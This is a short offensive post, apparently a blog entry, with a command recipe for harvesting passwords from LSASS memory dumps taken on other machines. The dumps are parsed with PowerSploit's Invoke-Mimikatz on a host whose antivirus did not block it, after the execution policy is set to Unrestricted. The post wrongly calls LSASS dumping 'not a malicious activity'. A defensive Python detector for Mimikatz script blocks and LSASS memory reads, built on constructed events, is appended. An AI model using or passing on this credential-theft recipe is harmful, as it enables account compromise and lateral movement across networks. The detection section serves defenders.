Came across a scenario where I was able to run PowerSploit on one machine (HOST) that had antivirus installed.
However, I wanted to crack passwords for other systems!
Simply get an LSASS dump from the other machines - not a malicious activity!
Copy all those LSASS dump files to HOST and, using PowerSploit's -Command argument, retrieve passwords from the LSASS dumps.
Execute the PowerSploit Invoke-Mimikatz tool to retrieve passwords from the LSASS dump file.
Commands quick reference:
- Get-ExecutionPolicy
- Set-ExecutionPolicy Unrestricted
- Import-Module .\powersploit.psm1
- Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'
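Added detection example, not part of the original post: since the antivirus on HOST did not stop PowerSploit, a defender would look instead at PowerShell Script Block Logging (Event ID 4104) on HOST for the Invoke-Mimikatz / sekurlsa:: strings in the command above, and at Sysmon ProcessAccess (Event ID 10) on the machines the dumps came from for processes opening lsass.exe with PROCESS_VM_READ. The event field names, host names, sample records and the LSASS allowlist are constructed assumptions, not real log data.

```python
import re

# Constructed sample events modelled on PowerShell Script Block Logging
# (Event ID 4104) and Sysmon ProcessAccess (Event ID 10). Not real log data.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "HOST", "script": "Get-ExecutionPolicy"},
    {"id": 4104, "host": "HOST", "script": "Set-ExecutionPolicy Unrestricted"},
    {"id": 4104, "host": "HOST", "script": "Import-Module .\\powersploit.psm1"},
    {"id": 4104, "host": "HOST",
     "script": "Invoke-Mimikatz -Command '\"privilege::debug\" "
               "\"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords\"'"},
    {"id": 10, "host": "WS02", "source": "C:\\Windows\\System32\\taskmgr.exe",
     "target": "C:\\Windows\\system32\\lsass.exe", "access": "0x1FFFFF"},
    {"id": 10, "host": "WS03", "source": "C:\\Windows\\System32\\svchost.exe",
     "target": "C:\\Windows\\system32\\lsass.exe", "access": "0x1000"},
]

# Module names in the script block survive renaming of the loader itself.
MIMIKATZ_RE = re.compile(r"invoke-mimikatz|sekurlsa::|privilege::debug", re.I)
POLICY_RE = re.compile(r"set-executionpolicy\s+(unrestricted|bypass)", re.I)
PROCESS_VM_READ = 0x10  # access right required to read LSASS memory
# Hypothetical allowlist; tune it to what legitimately opens LSASS in your estate.
LSASS_ALLOWLIST = {"c:\\windows\\system32\\csrss.exe",
                   "c:\\windows\\system32\\wininit.exe"}


def classify(event):
    """Return (rule, detail) for a suspicious event, or None if it looks benign."""
    if event["id"] == 4104:
        if MIMIKATZ_RE.search(event["script"]):
            return "mimikatz-script-block", event["script"][:60]
        if POLICY_RE.search(event["script"]):
            return "execution-policy-weakened", event["script"]
    elif event["id"] == 10 and event["target"].lower().endswith("\\lsass.exe"):
        source = event["source"].lower()
        # 0x1000 (query limited info) is normal; anything carrying VM_READ is not.
        if int(event["access"], 16) & PROCESS_VM_READ and source not in LSASS_ALLOWLIST:
            return "lsass-memory-read", f"{event['source']} access={event['access']}"
    return None


def detect(events):
    """Run every event through classify() and collect the alerts in order."""
    alerts = []
    for event in events:
        hit = classify(event)
        if hit:
            alerts.append({"host": event["host"], "rule": hit[0], "detail": hit[1]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['host']}: {alert['detail']}")
```

The LSASS rule fires on the machine where the dump was taken (WS02), while the script block rule fires on HOST where the dump is parsed; correlating both tells you the credentials were extracted offline rather than on the victim.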
Good references:
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?page_id=1821
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780